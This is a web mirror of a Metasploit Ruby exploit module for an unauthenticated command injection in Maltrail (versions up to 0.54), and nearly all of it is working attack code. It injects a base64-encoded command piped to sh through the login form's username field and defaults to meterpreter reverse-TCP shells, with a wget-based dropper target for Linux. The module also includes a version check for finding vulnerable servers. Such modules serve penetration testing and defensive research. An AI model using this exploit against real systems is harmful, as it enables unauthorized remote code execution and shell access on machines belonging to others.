Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::CmdStager

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Maltrail Unauthenticated Command Injection',

18
        'Description' => %q{

19
          Maltrail is a malicious traffic detection system, utilizing publicly

20
          available blacklists containing malicious and/or generally suspicious trails.

21
          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.

22
          The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains

23
          a command injection vulnerability in the `params.get("username")` parameter.

24
          An attacker can exploit this vulnerability by injecting arbitrary OS commands

25
          into the username parameter. The injected commands will be executed with the

26
          privileges of the running process. This vulnerability can be exploited remotely

27
          without authentication.

28


29
          Successfully tested against Maltrail versions 0.52 and 0.53.

30
        },

31
        'License' => MSF_LICENSE,

32
        'Author' => [

33
          'Ege BALCI <egebalci[at]pm.me>', # msf module

34
          'Valentin Lobstein',             # Add CVE reference + rewrite

35
          'Chris Wild',                    # original PoC, analysis

36
        ],

37
        'References' => [

38
          ['EDB', '51676'],

39
          ['CVE', '2025-34073'],

40
          ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],

41
          ['URL', 'https://github.com/stamparm/maltrail/issues/19146']

42
        ],

43
        'Platform' => %w[unix linux],

44
        'Privileged' => false,

45
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],

46
        'Targets' => [

47
          [

48
            'Unix Command',

49
            {

50
              'Platform' => 'unix',

51
              'Arch' => ARCH_CMD,

52
              'Type' => :unix_cmd,

53
              'DefaultOptions' => {

54
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'

55
              }

56
            }

57
          ],

58
          [

59
            'Linux Dropper',

60
            {

61
              'Platform' => 'linux',

62
              'Arch' => [ARCH_X86, ARCH_X64],

63
              'Type' => :linux_dropper,

64
              'CmdStagerFlavor' => :wget,

65
              'DefaultOptions' => {

66
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'

67
              }

68
            }

69
          ]

70
        ],

71
        'DisclosureDate' => '2023-07-31',

72
        'DefaultTarget' => 0,

73
        'Notes' => {

74
          'Stability' => [CRASH_SAFE],

75
          'Reliability' => [REPEATABLE_SESSION],

76
          'SideEffects' => []

77
        }

78
      )

79
    )

80
    register_options(

81
      [

82
        Opt::RPORT(8338),

83
        OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])

84
      ]

85
    )

86
  end

87


88
  def check

89
    res = send_request_cgi(

90
      'uri' => normalize_uri(target_uri.path),

91
      'method' => 'GET'

92
    )

93
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?

94
    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

95


96
    version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}

97


98
    if version < Rex::Version.new('0.54')

99
      return CheckCode::Appears("Version Detected: #{version}")

100
    end

101


102
    CheckCode::Safe("Version Detected: #{version}")

103
  end

104


105
  def execute_command(cmd, _opts = {})

106
    send_request_cgi(

107
      'uri' => normalize_uri(target_uri.path, 'login'),

108
      'method' => 'POST',

109
      'uri_encode_mode' => 'none',

110
      'headers' => {

111
        'ctype' => 'application/x-www-form-urlencoded'

112
      },

113
      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"

114
    )

115
  end

116


117
  def exploit

118
    case target['Type']

119
    when :unix_cmd

120
      print_status("Executing #{target.name}...")

121
      execute_command(payload.encoded)

122
    when :linux_dropper

123
      print_status("Executing #{target.name}...")

124
      execute_cmdstager

125
    end

126
  end

127
end

128


129